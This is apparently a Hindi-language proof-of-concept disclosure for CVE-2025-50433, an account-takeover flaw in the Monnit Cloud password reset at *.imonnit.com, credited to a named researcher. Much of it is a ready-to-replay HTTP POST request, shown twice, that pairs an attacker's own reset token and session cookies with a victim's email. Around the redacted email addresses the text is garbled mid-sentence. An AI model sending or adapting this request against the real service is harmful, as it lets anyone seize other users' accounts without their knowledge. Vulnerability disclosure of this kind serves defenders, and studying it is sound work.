
Monnit Cloud खाता अधिग्रहण (CVE-2025-50433) के लिए प्रूफ ऑफ कॉन्सेप्ट, पासवर्ड रीसेट में लापता टोकन-ईमेल सत्यापन का शोषण करता है और हमले के चरण, मूल कारण और उपचार प्रदान करता है।
एक गंभीर प्रमाणीकरण भेद्यता *.imonnit.com पर मौजूद है जो किसी भी उपयोगकर्ता खाते का पूर्ण खाता अधिग्रहण (ATO) पीड़ित के हस्तक्षेप के बिना करने की अनुमति देती है।
बैकएंड पासवर्ड-रीसेट टोकन और लक्ष्य ईमेल के बीच संबंध को मान्य करने में विफल रहता है, जिससे हमलावर अपने स्वयं के वैध रीसेट टोकन का उपयोग करके किसी भी पीड़ित खाते का पासवर्ड रीसेट कर सकते हैं।
[email protected]) बनाता है।[email protected]) है। POST /Account/PasswordReset/?VerificationCode=TTT4EB4I HTTP/1.1
Host: www.imonnit.com
Cookie: ASP.NET_SessionId=jf3y4eg3qdrefnfnqcj42yut; __RequestVerificationToken=dObesuZNYwsn9USVixM8aZTa9i_E_18PRpfCE0L39NUJlfolWpjSYX0BW32_mK50O5fcGbr3oBMg2S6D4ONl0bJhJS4kmxtHeQEn8Y0kNNt324q5Hc0Gu3JBHH7CwrylvP8XNQ2
__RequestVerificationToken=-realtoken5K0nzPC8H2Aw2&NewPassword=1!Password%21&ConfirmPassword=1!Password%21&[email protected]&[email protected]
POST /Account/PasswordReset/?VerificationCode=TTT4EB4I HTTP/1.1
Host: www.imonnit.com
Cookie: ASP.NET_SessionId=jf3y4eg3qdrefnfnqcj42yut; __RequestVerificationToken=dObesuZNYwsn9USVixM8aZTa9i_E_18PRpfCE0L39NUJlfolWpjSYX0BW32_mK50O5fcGbr3oBMg2S6D4ONl0bJhJS4kmxtHeQEn8Y0kNNt324q5Hc0Gu3JBHH7CwrylvP8XNQ2
__RequestVerificationToken=-realtoken5K0nzPC8H2Aw2&NewPassword=1!Password%21&ConfirmPassword=1!Password%21&[email protected]&[email protected]
CVSS 3.1: 9.8 (गंभीर)
वेक्टर: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
*.imonnit.com
पासवर्ड रीसेट एंडपॉइंट यह मान्य नहीं करता कि रीसेट टोकन रीसेट ऑपरेशन के दौरान प्रदान किए गए उसी ईमेल से संबंधित है, जिससे हमलावर-नियंत्रित टोकन का उपयोग करके मनमाने ढंग से पासवर्ड रीसेट सक्षम होते हैं।
/Account/PasswordReset/
विक्रेता: Monnit Corporation
Mohamed Mandor (0xmandor)
GitHub: https://github.com/0xmandor